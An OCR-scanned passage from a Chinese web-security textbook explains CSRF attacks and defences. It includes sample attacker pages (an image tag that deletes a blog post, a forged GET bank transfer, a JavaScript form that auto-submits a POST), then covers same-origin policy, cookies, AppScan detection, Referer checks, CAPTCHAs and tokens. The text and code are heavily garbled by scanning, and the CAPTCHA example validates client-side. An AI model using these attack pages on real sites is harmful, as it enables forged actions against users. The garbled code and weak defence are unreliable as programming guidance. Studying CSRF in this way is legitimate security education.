程 ,为 用 户 带 来 了 方便 。 但 如 果 带 有 用 户 认 证 信息 的 浏览 器 被 恶意 攻击 者 所 控制 后 ,在 
合法 用 户 并 不 知情 的 情况 下 发 送 一 些 请 求 ,这 将 会 使 用 户 做 一 些 自己 并 不 想 做 的 操作 ， 
从 而 受到 CSRF 攻击 。 

CSRF 的 攻击 原理 如 图 3. 22 所 示 。 

首先 , 当 用 户 需 要 访问 某 一 需要 认证 用 户 信 息 的 可 信任 的 Web 时 ,用 户 会 通过 浏览 
器 向 可 信 的 Web 站 点 A 发 送 一 个 请 求 ,如 图 3. 22 中 四 所 示 。 当 服务 器 收 到 请 求 后 会 验 
证 是 否 是 合法 用 户 ,如果 是 ,就 会 和 浏览 器 建立 一 个 经 过 认证 了 的 会 话 ,并 发 送 包含 用 户 
认证 信息 的 cookie 到 浏览 器 中 ,如 图 3. 22 中 加 所 示 。 建 立 认 证 关系 后 ,服务 器 收 到 所 有 
来 自 该 会 话 的 请 求 都 认为 是 该 合法 用 户 所 发 来 的 ,是 可 以 信任 的 。 当 浏览 器 向 该 可 信任 
的 站 点 A 发 送 一 个 有 效 的 请 求 时 , 即 Web 浏览 器 企图 执行 一 个 可 信 的 动作 。 可 信 的 站 
点 A 经 确认 发 现 ,该 用 户 已 通过 认证 ,所 以 该 动作 将 被 执行 ,如 图 3. 22 中 国 所 示 。 攻 击 
者 为 了 在 可 信任 站 点 上 实现 他 的 攻击 意图 ,在 掌握 了 可 信任 站 点 A 的 相关 信息 后 ,在 攻 
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Cs NN 
钙 输 入 用 户 名 ， 密 码 登录 A 


K Di 返回 A 产生 的 cookie 信 息 | ”可 信息 站 点 A 
@/@ 携 带 A 产生 的 cookie 访 问 A > 


浏览 器 
/一 
@ 访 问 B > 
攻击 者 站 点 B 
< 加 返回 攻击 代码 ， 让 浏览 器 访问 A 
一 


图 3.22 CSRF 攻击 流程 


击 者 的 站 点 B 上 精心 构造 一 个 页 面 , 让 用 户 在 其 浏览 器 上 执行 攻击 者 的 页 面 ,如 图 3. 22 
中 国 所 示 。 这 时 攻击 者 页 面 的 代码 就 会 让 用 户 浏览 器 去 执行 一 些 恶意 操作 ,如 图 3. 22 
中 加 所 示 。 浏 览 器 会 将 攻击 者 发 来 的 恶意 攻击 代码 和 用 户 的 cookie 信息 一 并 发 给 站 点 
A, 如 图 3.22 中 @ 所 示 。 这 样 攻击 者 就 完成 了 一 次 CSRF 攻击 ,实现 了 其 预想 的 攻击 
目的 。 

我 们 可 以 举 个 简单 的 例子 。 假 设 有 博客 网 站 www. blog. com ,用户 Bob 是 该 网 站 注 
册 过 的 用 户 ,该 网 站 用 cookie 隐 式 认证 用 户 的 登录 信息 。 如 果 Bob 想 把 发 表 在 该 网 站 上 
的 一 篇 博客 删除 ,他 可 以 在 登录 页 面 www. blog. com/Bob_id=111/ 后 , 单 击 “删除 ?按钮 
删除 博客 ,假设 删除 编号 为 111 的 博客 的 连接 为 : www. blog. com/ Bob/del? id=111, 当 
Bob 单 击 “删除 ?按钮 ,向 服务 器 发 出 这 个 删除 请 求 时 ,这 时 可 以 成 功 地 将 ID 为 111 的 博 
客 内 容 删除 。 我 们 再 次 假设 有 一 个 恶意 攻击 者 Alice, 他 掌握 了 站 点 www. blog. com 上 
的 参数 设置 后 ,就 在 恶意 站 点 www. attck. com 上 来 构造 一 个 页 面 csrf. html, 该 页 面包 
含 了 一 段 删 除 www. blog. com 站 点 博客 的 代码 。 例 如 在 csrf. html 写 入 代码 : 


< img src=http:// www.blog.caBcbydel?id= 123> 


这 时 Alice 会 利用 一 次 社工 技巧 诱 使 Bob 去 单 击 该 页 面 。 当 已 经 登录 了 blog. com 
的 用 户 Bob 去 访问 页 面 http://www. attck. com/csrf. html 时 ,用户 Bob 就 会 发 现 他 的 
一 篇 ID 为 123 的 博客 被 删除 了 ,而 这 并 不 是 他 想 要 做 的 事情 。 这 就 是 Alice 向 Bob 发 起 
的 一 次 简单 的 CSRF 攻击 ,其 实现 过 程 非常 简单 。 究 其 原因 ,我 们 可 以 看 到 是 因为 Bob 
在 执行 了 页 面 http://www. attck. com/csrf. html 后 加 载 了 一 个 二 img 二 标签 ,该 标签 的 
src 属性 的 值 就 会 被 当成 是 一 个 图 片 的 URL 去 执行 ,这 样 就 导致 了 上 述 结果 的 发 生 。 从 
上 面 例子 我 们 可 以 看 出 ,攻击 者 Alice 要 想 成 功 的 对 Bob 发 起 一 次 CSRF 攻击 , 它 必须 得 
让 用 户 Bob 的 浏览 器 去 执行 一 个 Bob 并 不 知道 的 操作 ,Bob 在 站 点 www. blog. com 上 
有 删除 自己 博客 的 权限 ,Alice 通过 CSRF 攻击 执行 了 和 Bob 具有 同样 权限 的 操作 ,这 就 
说 明 攻 击 者 可 以 获取 跟 用 户 同样 的 操作 权限 ,也 就 是 说 用 户 可 以 执行 的 操作 CSRF 攻击 
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者 都 可 以 执行 ,站 点 为 用 户 赋予 的 权限 越 大 ,受到 CSRF 攻击 的 后 果 也 越 严重 。 在 基于 
cookie 等 隐 式 认证 [26] 的 站 点 内 ,如 果 没 有 专门 预防 CSRF 的 机 制 ,攻击 者 基本 都 可 以 
成 功 地 发 起 CSRF 攻击 。 
在 上 面 的 例子 中 ,Alice 之 所 以 能 够 成 功 的 实现 对 Bob 的 CSRF 攻击 ,主要 是 因为 他 
满足 了 以 下 几 个 条 件 : 
(1) 被 攻击 的 www. blog. com 站 点 的 操作 是 依赖 于 用 户 Bob 在 该 站 点 上 具有 合法 
的 用 户 身份 。 
(2) 站 点 www. blog. com 允许 来 自 Bob 浏览 器 上 的 一 切 请 求 操作 。 
(3) 在 Bob 没有 登录 www. blog. com 的 情况 下 ,又 单 击 执行 了 页 面 http://www. 
attck. com/csrf. html 的 连接 。 
(4) 站 点 www. blog. com 允许 HTTP 请 求 在 后 台 执 行 了 一 些 敏感 的 操作 。 
在 通常 情况 下 ,CSRF 攻击 能 够 给 用 户 造成 的 危害 主要 有 : 以 用 户 的 名 义 发 送 邮件 ; 
发 消息 ; 盗 取 用 户 的 账号 ;甚至 于 购买 商品 ;虚拟 货币 转账 等 ,这 些 都 可 能 导致 用 户 的 个 
人 隐私 泄露 或 财产 损失 等 问题 。 
我 们 来 看 一 个 实际 的 例子 。 假 设 有 一 个 银行 页 面 是 用 GET 方式 提交 转账 信息 来 完 
成 转账 功能 的 ,其 提交 转账 信息 表单 代码 如 下 所 示 : 
< fom actiore= "Transfer.php" method= "GET"> 
< 户 转 入 账户 : < input type= "text" name= "PoountId" />< /p> 
< 户 转 入 金额 : < input type= "text" name= "nunber" />< /p> 
<p><input type= "simit" value= "转账 " />< /p> 
< /fom> 
其 后 台 处 理 程序 transfer. php 的 代码 如 下 : 
< ahp 
session start (); 
if(isset ($ REQUEST ["accountTId'] &&isset($ REQUEST ["nmiber'])) 
{ 


transfer acount ($_ REOUEST ['AcoountTd'],$ RECUEST [nber']); 
} 
用 户 想 通过 该 页 面向 银行 账号 为 11 的 用 户 转 入 1000 元 时 ,该 页 面 就 会 用 URL: 
http://www. Bank. com/ Transfer. php? AccountId 王 11&number 王 1000 向 服务 器 提出 
请 求 , 服 务 器 将 按照 用 户 的 请 求 执行 ,以 完成 转账 。 然 而 . 当 攻 击 者 掌握 了 网 站 提交 数据 
的 相关 参数 后 ,就 可 以 伪造 出 相同 的 URL 并 将 其 放 入 攻击 者 的 网 站 www. csrf. com 的 
页 面 Attck_GET. html 中 等 待 使 用 该 网 银 的 用 户 去 执行 。 攻 击 者 利用 电子 邮件 或 其 他 
一 些 社工 手段 将 攻击 页 面 Attck_GET. html 的 URL 发 送 给 被 攻击 者 ,让 被 攻击 者 去 单 
击 执行 攻击 页 面 。 

攻击 者 在 域 www. csrf. com 上 构造 页 面 Attck_GET. html 的 代码 如 下 : 


<htm> 
<head> 
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<meta http- eqaiv "Content— Type" content= "text/html; dharset= go2312" /> 
<title> Attck GET< /title> 
< /head> 
<body> 
< img src=http://www.Bank.coryTransfer.php?AcoountIG= 11&nmiber= 1000> 
< /body> 
< /html> 
当 正 在 访问 Back 网 银 的 合法 用 户 打开 页 面 Attack_GET. html 时 ,浏览 器 把 上 面 的 
二 img 二 标签 认为 是 一 个 正常 的 图 片 标签 去 执行 上 面 的 请 求 ,这 时 就 会 向 服务 器 发 送 一 
个 转账 请 求 ,服务 器 会 认为 是 合法 用 户 的 合理 请 求 而 去 执行 。 这 是 一 个 跨 域 的 请 求 而 没 
被 浏览 器 的 同 源 策略 所 限制 ,这 就 会 让 银行 网 站 去 执行 转账 操作 。 


2. CSRF 的 漏洞 原因 分 析 


在 Web 中 要 成 功 地 完成 一 次 CSRF 攻击 ,攻击 者 一 定 是 通过 某 种 方式 ,突破 了 浏览 
器 的 一 些 安全 机 制 和 Web 应 用 程序 的 安全 设置 。 要 研究 CSRF 攻击 的 实现 过 程 , 就 必 
须 得 从 这 些 安全 策略 人 手 ,分析 攻击 者 为 了 实现 CSRF 攻击 ,是 通过 什么 方式 绕 过 这 些 
策略 ,来 完成 攻击 。 我 们 接 下 来 将 介绍 基于 Web 浏览 器 所 采用 的 一 些 安全 策略 ,其 中 包 
括 同 源 策略 ,cookie 机 制 和 P3P 头 机 制 等 。 

1) 同 源 策略 

同 源 策略 (Same Origin Policy,SOP) 也 叫 同 域 策略 , 它 是 一 种 约定 ,也 是 浏览 器 最 核 
心 . 最 基本 的 安全 功能 ,如 果 缺 少 同 源 策略 ,浏览 器 的 正常 功能 可 能 都 受到 影响 。 可 以 说 
Web 是 构建 在 同 源 策略 的 基础 上 的 ,浏览 器 只 是 对 同 源 策 略 的 一 种 实现 。 

“ 源 ” 的 构成 要 素 包 括 域名 .端口 和 协议 , 同 源 策略 就 是 指 一 些 动 态 脚本 只 能 访问 与 
之 同 域名 、 同 端口 、 同 协议 的 HTTP 应 答 或 cookie 等 , 当 访问 不 同 源 的 资源 时 将 受到 限 
制 。 下 面 我 们 通过 一 个 实例 来 描述 同 源 策略 的 具体 情况 。 假 设 存在 一 个 域 http:// 
www. csrf. com/dir/page. html, 表 3.1 列 出 了 与 此 域 相 比较 的 若干 域 , 通 过 比较 可 以 看 
出 是 否 和 该 域 同 源 ,以 及 不 同 源 的 原因 。 


表 3.1 同 源 策略 列举 


URL 同 源 原 
http://www. csrf. com/dir2/other. html 是 
http://www. csrf. com/dir/inner/another. html 是 
https://www. csrf. com/secure. html 否 协议 不 同 
http://www. csrf. com:81/dir/etc. html 否 端口 不 同 
http://news. csrf. com/dir/other. html 否 域名 不 同 


我 们 从 表 3. 1 可 以 看 出 ,影响 同 源 策略 的 因素 有 主机 域名 、 协 议和 端口 。 对 于 当前 
页 面 而 言 ,页 面 内 存在 的 JavaScript 文件 的 域 并 不 重要 ,重要 的 是 加 载 JavaScript 页 面 所 
在 的 域 是 哪个 域 。 在 同一 个 域 的 不 同 子 域 间 进 行 访问 也 会 被 同 源 策略 所 限制 ,为 了 解决 
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同 源 策略 的 这 种 限制 ,在 JavaScript 中 通过 设置 页 面 中 的 document. domain 变量 来 让 同 
一 域 的 不 同 子 域 之 间 可 以 相互 访问 。 

例如 ,在 页 面 http://A. CSRF. com/dir/page. html 和 页 面 http://B. CSRF. com/ 
dir/page. html 中 都 加 入 如 下 代码 : 

< script> 

document.doamainr "CsRF.oom" 

< /script> 

这 两 个 基于 域 CSRF. com 的 子 域 页 面 之 间 的 JavaScript 代码 就 可 以 互相 读 取 页 面 
内 容 并 发 送 HTTP 请 求 。 这 样 ,如果 恶意 攻击 者 通过 某 种 攻击 手段 能 够 向 其 中 某 一 个 
子 域 注入 JavaScript 代码 ,那么 在 该 域 中 的 其 他 子 域 也 同样 会 被 攻击 者 注入 JavaScript 
代码 并 加 以 利用 。 当 然 , 用 这 种 方法 突破 同 源 策略 是 有 一 定 限度 的 ,因为 变量 document. 
domain 只 能 设置 为 页 面 所 在 的 上 一 级 域 的 值 。 例 如 , 另 一 域 的 页 面 http://www. XXS. 
com/dir/page. html, 即 使 设置 了 上 述 代 码 也 不 能 访问 上 面 两 个 页 面 。 同 源 策略 是 各 浏览 
器 的 安全 基础 ,如 果 完 全 绕 过 同 源 策略 的 限制 , 那 攻击 者 就 会 得 到 系统 权限 。 例 如 ,在 各 
种 漏洞 危害 中 居于 首位 的 跨 站 脚本 攻击 (Cross-site Scripting) 就 是 直接 攻击 同 源 策略 ， 
我 们 将 要 重点 论述 的 CSRF 攻击 主要 是 要 绕 过 同 源 策 略 的 限制 而 并 非 是 直接 攻击 同 源 
策略 。 

在 JavaScript 中 ,一 些 带 src 属性 的 标签 可 以 跨 域 加 载 资源 ,例如 ,一 scritp 二 一 img 二 、 
所 iframe 二 、 志 link 二 等 标签 都 能 被 同 源 策略 允许 而 跨 域 加 载 资 源 。 这 些 标签 跨 域 加 载 资 
源 的 过 程 其 实 是 浏览 器 发 送 一 次 GET 请 求 的 过 程 。 

对 于 XMLHttpRequest 来 说 , 它 可 以 访问 来 自 同 源 的 内 容 , 由 于 受 同 源 策 略 的 限制 ， 
它 并 不 能 跨 域 访 问 。 但 同 源 策略 并 没有 限制 跨 域 的 信息 提交 ,一 个 域 可 以 用 
XMLHttpRequest 将 数据 提交 给 另外 一 个 域 ,然而 , CSRF 攻击 正好 是 利用 了 
XMLHttpRequest 可 以 跨 域 提交 数据 的 特性 实施 攻击 的 。 另 外 ,GET 和 POST 也 可 以 
里 源 提交 数据 ,有 了 这 个 特性 ,攻击 者 可 以 在 伪造 的 页 面 中 加 入 一 段 JavaScript 代码 ,将 
攻击 者 预先 要 向 通过 了 被 攻击 者 认证 站 点 提交 的 数据 写 入 该 代码 中 , 当 被 攻击 者 单 击 该 
伪造 页 面 ,执行 这 段 预先 写 好 的 代码 时 ,将 通过 GET 或 者 POST 方式 ,将 相应 的 数据 提 
交 到 已 经 通过 认证 的 站 点 ,而 同 源 策略 并 不 会 阻止 这 种 跨 域 信息 的 提交 。 当 然 ,GET 方 
式 将 提交 数据 的 大 小 限制 在 2KB, 这 样 就 会 限制 较 大 数据 的 提交 。 相 反 ,POST 方式 不 
限制 提交 数据 的 大 小 ,这 样 就 为 创建 Form 表单 提交 数据 提供 了 一 个 很 好 的 机 会 。GET 
或 者 POST 的 这 种 跨 源 提交 数据 的 方式 为 实施 CSRF 攻击 提供 了 可 能 。 在 实际 利用 
POST 请 求 提 交 数 据 时 ,为 了 让 CSRF 攻击 具有 更 好 的 隐蔽 性 ,通常 要 将 表单 装 和 人 一 个 
大 小 为 0 的 iframe 中 , 当 执行 攻击 页 面 加载 这 个 iframe 提交 数据 时 不 会 让 被 攻击 者 轻 
易 发 现 。 

2) cookie 安全 策略 

由 于 HTTP 协议 是 无 状态 协议 ,浏览 器 只 会 发 送 和 接收 HTTP 请 求 和 响应 ,而 每 次 
HTTP 请 求 和 响应 之 间 的 关系 在 浏览 器 看 来 并 没有 关联 ,是 相互 独立 的 。 但 在 实际 的 网 
络 应 用 开发 过 程 中 ,为 了 能 给 用 户 带 来 良好 的 用 户 体验 ,网 站 通常 需要 避免 用 户 重 复 输 
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入 认证 信息 ,让 用 户 输入 一 次 认证 信息 后 ,随后 的 访问 能 够 由 浏览 器 来 自动 认证 。 为 了 
解决 这 个 问题 ,在 Web 开发 过 程 中 ,服务 器 就 将 一 些 用 户 的 认证 信息 和 HTTP 的 会 话 的 
状态 信息 发 送 到 本 地 浏览 器 端 进行 存储 ,从 而 ,cookie 就 应 运 而 生 了 。 当 服务 器 端 生 成 
cookie, 并 发 送 到 浏览 器 中 存储 后 ,浏览 器 每 次 发 送 重 复 的 认证 信息 时 ,不 需要 用 户 多 次 
输入 ,只 要 在 HTTP 请 求 的 头 部 中 带 上 cookie 一 并 发 送 给 服务 器 就 可 以 完成 用 户 认证 。 
cookie 的 具体 工作 原理 如 图 3. 23 所 示 。 


NS 
人 Web 而 
KK、 名 服 务 器 响应 页 面 请 求 ， 并 发 送 cookie 信 息 
Web cookie 信 息 Web 
浏览 器 服务 器 
@ 浏 览 器 请 求 同 一 域 下 的 页 面 时 会 带 上 cookie 信 息 > 
cookie 信 息 
i WwW 二 


3.23 cookie 工作 原理 


浏览 器 的 cookie 分 为 两 种 : 一 种 是 Session cookie, 又 称 “ 临 时 cookie”; 另 一 种 是 
Third-party cookie, 也 称 为 "本 地 cookie”。 就 两 者 的 区 别 而 言 ,Third-party cookie 是 服 
务 器 在 Set-cookie 时 指定 了 Expire 时 间 , 只 有 到 了 Expire 时 间 后 ,cookie 才 会 失效 ,所 
以 这 种 cookie 会 保存 在 本 地 ;而 Session cookie 则 没有 指定 Expire 时 间 , 所 以 浏览 器 关 
闭 后 Session cookie 就 会 立即 失效 。 在 浏览 网 站 的 过 程 中 ,若是 一 个 网 站 设置 了 Session 
cookie ,那么 在 浏览 器 进程 的 生命 周期 内 ,即使 浏览 器 新 打开 了 Tab 页 面 ,Session cookie 
也 都 是 有 效 的 。Session cookie 保存 在 浏览 器 进程 的 内 存 空 间 中 ;而 Third-party cookie 
则 保存 在 本 地 。 

目前 的 网 站 大 多 都 在 用 cookie 作为 认证 用 户 信息 和 保存 浏览 器 会 话 状 态 的 工具 , 当 
用 户 完 成 身份 验证 之 后 ,不 管 是 生成 了 Session cookie 还 是 Third-party cookie, 只 要 在 不 
退出 浏览 器 的 情况 下 ,用户 访 问 相 同 网 站 时 都 会 自动 带 上 这 个 cookie 而 不 需要 网 站 重新 
认证 。 这 种 认证 方式 称 之 为 隐 式 认证 。 

现在 很 多 用 户 上 网 使 用 多 窗口 或 多 标签 页 浏览 器 ,例如 ,傲游 .Firefox、Opera 等 。 
这 些 浏览 器 在 方便 用 户 的 同时 也 增 大 了 风险 ,因为 它们 只 有 一 个 进程 运行 ,cookie 在 各 
个 窗口 或 标签 页 之 间 是 共享 的 。 

除了 cookie 认证 方式 之 外 ,其 他 Web 认证 机 制 也 面临 同样 的 问题 。 例 如 , HTTP 
基本 认证 ,用 户 通 过 认证 后 ,浏览 器 仍 会 “智能 "地 把 用 户 名 和 口令 附加 到 之 后 第 三 方 发 
给 站 点 的 请 求 中 。 即 使 网 站 使 用 了 安全 套 接 字 (SSL) 来 加 密 连 接 , 浏 览 器 也 会 “智能 ”地 
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自动 把 SSL 认证 信息 加 到 第 三 方 发 给 站 点 的 请 求 中 。 

3) P3P 的 副作用 

Internet Explorer 在 处 理 cookie 时 ,还 遵守 P3P(Platform for Privacy Preferences) 
规范 。P3P 是 W3C 制定 的 一 项 关于 cookie 的 隐私 保护 标准 ,要 求 网 站 向 用 户 表 明 它 对 
用 户 隐私 的 处 理 。 例 如 ,将 收集 哪些 信息 ,信息 做 何 用 途 等 。 如 果 该 站 点 的 信息 收集 行 
为 同 用 户 设 定 的 标准 相符 , 则 两 者 之 间 关 于 个 人 隐私 信息 的 协定 就 可 以 自动 地 缔结 ,而 
用 户 可 毫 无 阻碍 地 浏览 该 站 点 ;如 果 不 符 ,浏览 器 会 提醒 用 户 , 由 用 户 决 定 是 否 对 自己 制 
定 的 个 人 隐私 策略 作出 修改 以 进入 该 网 站 ,双方 最 终 通过 一 个 双向 的 选择 达成 用 户 个 人 
隐私 策略 。P3P 策略 产生 了 一 个 副作用 , 即 如 果 一 个 网 站 设置 了 有 效 的 P3P 策略 ， 
Internet Explorer 允许 第 三 方 到 它 的 Web 请 求 自动 带 上 cookie, 网 站 可 能 遭 到 CSRF 攻 
击 ; 如 果 一 个 网 站 没有 设置 P3P 策略 或 者 P3P 策略 无 效 , 第 三 方 到 它 的 Web 请 求 不 会 带 
有 该 网 站 的 cookie, 反 而 免 受 CSRF 攻击 。 


3. CSRF 攻击 分 类 


1) GET 型 

GET 类 型 前 文 已 经 介绍 过 ,利用 的 就 是 img ,iframe script 等 标签 对 象 可 以 跨 域 发 
送 GET 请 求 , 攻 击 者 可 以 构建 包含 攻击 性 请 求 的 页 面 ,然后 诱 使 用 户 点 击 。 

2) POST 型 

在 CSRF 攻击 流行 之 初 , 很 多 开发 者 都 错误 地 认为 CSRF 攻击 只 能 利用 GET 请 求 
来 发 动 攻击 ,而 使 用 POST 请 求 ,就 能 防止 CSRF 攻击 。 

这 种 错误 的 观点 形成 的 原因 主要 在 于 大 多 数 CSRF 攻击 发 起 时 ,使 用 的 HTML 标 
签 都 是 img ,iframe script 等 带 有 src 属性 的 标签 ,这 类 标签 只 能 发 起 一 次 GET 请 求 , 而 
不 能 发 起 POST 请 求 , 但 是 对 于 攻击 者 来 说 ,有 若干 种 方法 可 以 构建 一 个 POST 请 求 。 
例如 ,表单 提交 发 起 的 就 是 POST 请 求 , 而 且 这 个 POST 请 求 是 可 以 跨 域 的 。 所 以 最 简 
单 的 方法 ,就 是 在 一 个 页 面 中 构建 好 一 个 form 表单 ,然后 使 用 JavaScript 自动 提交 这 个 
表单 。 下 面 是 一 个 简单 的 构建 form 表单 使 用 POST 请 求 达 到 CSRF 攻击 的 代码 : 


<body> 
< /body> 
< script type= "text/javascript"> 
finction new_form() 
{ 
Var 个 document.createPlement ("fomm"); 
document.body.appendchild(f)7 
fmethodF "post"; 
retum f; 
} 
finction create elements (eFomm, eName,éValue) 
{ 
Var e= document.createFlement (“input"); 
etype= "text'’; 


e-name= eName; 
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e.style.display= "block'; 
e.style.width= 'Opx'; 
e.style.height= 'Opx'; 

} 

e.value= eValue; 

retum e; 

} 


Var 全 new fom(); 
Create _ elements ( f,"title","hi"); 
_f.actionF "http://www.a.om/blog/add"; 
_ 下 -sumit (); 
< /script> 
当 目标 网 站 A 的 用 户 被 欺骗 访问 了 恶意 网 站 B 的 该 页 面 , 一 个 路 域 的 伪造 POST 表 
单 请 求 就 发 出 了 。 同 样 ,该 请 求 中 也 会 带 上 目标 网 站 A 的 用 户 。 


4. CSRF 检测 与 防御 


CSRF 攻击 与 跨 站 脚本 (XSS) 等 攻击 形式 相 比 ,其 流行 程度 要 低 很 多 ,这 就 导致 Web 
开发 人 员 更 容易 忽视 CSRF 的 安全 问题 ,甚至 一 些 开 发 人 员 并 不 了 解 这 一 问题 。 在 
CSRF 攻击 中 所 发 送 的 HTTP 请 求 虽然 是 攻击 者 所 伪造 的 ,但 却 是 通过 被 攻击 者 的 计算 
机 所 发 送 ,使 服务 器 很 难 分 辨 请 求 是 由 合法 用 户 发 送 还 是 由 攻击 者 所 发 送 ,这 就 导致 
CSRF 攻击 的 防御 比 SQL 注入 、 跨 站 脚本 等 漏洞 更 难 。 然 而 ,如 果 对 CSRF 攻击 不 予以 
高 度 重视 的 话 可 能 会 产生 很 严重 的 安全 后 果 。 一 般 的 攻击 防范 ,都 可 以 从 服务 端 和 客户 
端 两 方面 和 人手, 因为 跨 站 请 求 伪造 主要 是 针对 服务 端的 欺骗 ,所 以 这 里 攻击 的 防范 主要 
在 服务 端 进行 。 防 范 的 核心 思想 则 是 在 服务 器 端 不 唯一 依靠 浏览 器 所 直接 提交 的 身份 
认证 信息 ,而 需要 添加 额外 的 校 验 信息 。 我们 接 下 去 会 通过 分 析 如 何 利用 Rational 
AppScan 工具 和 手动 精确 检测 相 结 合 的 方式 对 CSRF 漏洞 进行 检测 ,提出 对 CSRF 攻击 
的 防御 手段 。 重 点 采用 验证 HTTP Referer 字段 .在 请 求 地 址 中 添加 token 并 验证 ,在 
HTTP 头 中 自 定义 属性 并 验证 等 方式 对 CSRF 攻击 做 出 有 效 的 防御 。 

1) 运用 Rational AppScan 检测 CSRF 

APPSCAN 主要 用 于 网 络 安 全 检测 , 它 的 功能 非常 强大 ,现在 属于 IBM 的 Rational 
产品 线 ,其 主要 功能 是 对 网 络 应 用 进行 安全 检测 和 防范 , 它 的 功能 有 静态 与 动态 之 分 ,能 
够 从 代码 和 产品 两 个 方面 做 安全 检测 。Rational AppScan 的 测试 方法 比较 简单 , 它 通过 
庞大 完整 的 攻击 特征 库 来 判断 Web 应 用 是 否 存在 相应 的 攻击 。 从 AppScan 7.7 开始 就 
加 入 了 检测 CSRF 漏洞 的 功能 。 检 测 的 基本 原理 是 通过 向 被 检测 的 同一 地 址 或 服务 依 
次 发 出 两 次 请 求 ,在 发 送 完 第 一 次 请 求 后 ,退出 登录 ,然后 再 发 送 第 二 次 请 求 , 如 果 一 个 
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没有 CSRF 漏洞 或 已 经 做 过 CSRF 漏洞 防范 的 站 点 ,对 两 次 请 求 所 返回 不 同 的 结果 ,这 
是 因为 AppScan 检测 时 对 目标 资源 的 操作 是 在 两 个 不 同 的 Session 中 进行 的 ,返回 的 结 
果 肯 定 不 会 相同 。 

在 用 Rational AppScan 测试 CSRF 漏洞 时 ,可 以 采用 全 路 径 覆 盖 测 试 的 方式 进行 。 
在 一 个 Web 应 用 中 ,可 能 会 存在 大 量 的 URL, 如 果 对 每 个 URL 都 作 精 确 测试 可 能 需要 
花费 大 量 的 精力 。 在 这 种 情况 下 ,需要 使 用 Rational AppScan 对 Web 应 用 进行 全 路 径 
覆盖 测试 ,这 样 就 可 以 保证 测试 能 够 覆盖 到 Web 应 用 的 每 个 路 径 。 尤 其 是 在 测试 很 多 
已 经 做 过 CSRF 防护 的 应 用 的 时 候 , 利 用 Rational AppScan 进行 全 路 径 获 盖 测 试 会 大 大 
提高 测试 的 效率 。 

2) 验证 HTTP Referer 

在 HTTP 协议 的 请 求 头 部 含有 一 个 字段 叫 Referer, 它 记录 了 本 次 请 求 的 来 源 地 址 。 
只 需 校 验 Referer 是 否 以 本 域 作为 来 源 , 则 可 以 判断 这 个 请 求 的 真 伪 。 这 种 方式 的 优点 
在 于 简单 易 用 ,开发 人 员 只 需 用 在 敏感 操作 前 增加 一 个 拦截 器 检查 Referer 的 值 即 可 。 
对 于 已 有 的 系统 ,不 需要 改动 内 部 的 逻辑 ,比较 方便 ,但 这 种 方法 并 不 是 百 分 百 有 效 。 每 
个 浏览 器 对 HTTP 协议 的 实现 有 一 些 差别 ,目前 已 经 发 现 ,IE6 的 浏览 器 Referer 的 值 是 
可 以 被 算 改 。 对 于 新 版 浏览 器 ,虽然 无 法 自 改 Referer 值 ,但 部 分 用 户 基 于 隐 式 权 的 需 
要 ,可 以 设置 浏览 器 发 送 的 请 求 不 包含 Referer 信息 。 这 些 用 户 在 访问 时 会 被 误 认为 伪 
造 的 请 求 , 从 而 拒绝 了 合法 用 户 的 访问 。 我 们 可 以 用 如 下 代码 防止 外 部 链接 的 请 求 : 


< ?pp 
/来 源 文件 必须 是 当前 页 
S$source referer= "http://www.discuss.oom/show.php"; // 检查 来 源 页 是 否 正 确 
if (stmamp($_SERVER["HTTP_ REFFRER"]，$source referer, strlen($souroe referer))) 
{ 
// 清 除 $_POST 变量 
nset ($_POST); 


> 


在 这 里 ,函数 strncnmp() 是 用 来 检测 访问 页 面 的 Referer 与 我 们 设 定 的 页 面 的 
Referer 是 否 一 致 ,如 果 不 一 致 , 则 说 明 这 个 请 求 不 是 来 自 合 法 页 面 http://www. 
discuss. com/show. php 的 请 求 ,我 们 就 要 清除 这 个 POST 请 求 。 这 样 就 可 以 拒绝 伪造 
的 请 求 执行 访问 和 删除 帖子 的 操作 。 

3) 加 密 cookie 信息 

在 敏感 操作 的 提交 内 容 中 ,添加 一 个 对 cookie 进行 Hash 后 的 值 ,服务 器 端 对 Hash 
值 进行 校 验 , 若 通过 则 是 合法 的 用 户 请 求 。 因 为 在 直接 的 跨 站 请 求 伪造 攻击 中 ,黑客 其 
实 是 无 法 获取 cookie 的 具体 内 容 . 因 此 也 无 法 构造 一 个 Hash 后 的 cookie 值 ,从 而 杜绝 
了 路 站 请 求 攻击 的 实施 。 但 是 这 种 方法 还 有 一 种 可 能 的 泄露 情况 , 即 如 果 黑 客 先 通 过 
XSS 攻击 盗 取 了 用 户 的 cookie, 然 后 再 利用 盗 取 的 cookie 生成 Hash 值 而 制作 伪造 请 求 。 
这 种 情况 的 攻击 实现 比较 烦琐 复杂 ,涉及 XSS 和 CSRF 两 种 攻击 的 结合 使 用 。 

4) 添加 人 工 验证 码 
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每 次 的 操作 都 需要 用 户 填 写 一 个 图 片上 的 随机 字符 串 。 校 验 码 由 服务 器 端 生 产 , 黑 
客 是 无 法 获知 每 一 次 操作 的 校 验 码 并 附加 在 伪造 的 请 求 中 。 这 种 方法 从 理论 上 是 完全 
解决 跨 站 请 求 伪造 的 攻击 问题 。 但 这 要 求 用 户 在 敏感 操作 的 时 候 都 需要 输入 验证 码 , 降 
低 了 系统 的 易 用 性 ,而 且 验 证 码 图 片 对 部 分 IE 浏览 器 而 言 ,存在 一 个 MHTML 的 漏洞 
(MS11-037)。 这 里 有 个 生成 验证 码 的 简单 例子 。 


< script> 
Var VerifyCode ; // 定 义 验证 码 
finction create Verifycode() 
{ // 生 成 验证 码 
Verifycode= new PRrray(); 
var Verifycode Tength= 5; // 设 置 验证 码 长 度 为 5 


Var check VerifyCode= document. .getElementById ("heckCode"); 
checkCode.value= "™; 
Var selectChar= new Array('a', b', 'c', 'd', 'e', 'f','g", h' ,i,j k,l m,n', ‘0', py gq, 'r', 
‘st ,VW x YZ 10%, 1, ,13,1 4,15, 6", "7', '8','9"); 
for (var i= 0;i< VerifyCode Length;i++) 
{ 
Var charIndex= Math.floor Math.randcm() * 32); 
code+ = selecthar [harIndex]; 
} 
if (code.length!= VerifyCode Length) 
{ 
create VerifyCode() ; 
} 
CheckCode .value= VerifyCode; 
} 
function validate () 
{ 
Var jnputCode= docoument .getElementById ("input1") .value.toUpperCase (); 
if (inputCoge.length <=0) 
{ 
alert ("请 输入 验证 码 !"); 
retum false; 
} 
else if (inputCode!= VerifyCode ) 
{ 
alert ("验证 码 不 正确 !"); 
CreateCode (); 
retum false; 


alert ("验证 成 功 !"); 
retum true; 


< /script> 
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5) 使 用 令 牌 

添加 一 个 隐藏 表 单 域 记 录 随 机 的 令 牌 ,在 求 的 参数 中 包含 该 令 牌 。 服 务 器 端 执行 操 
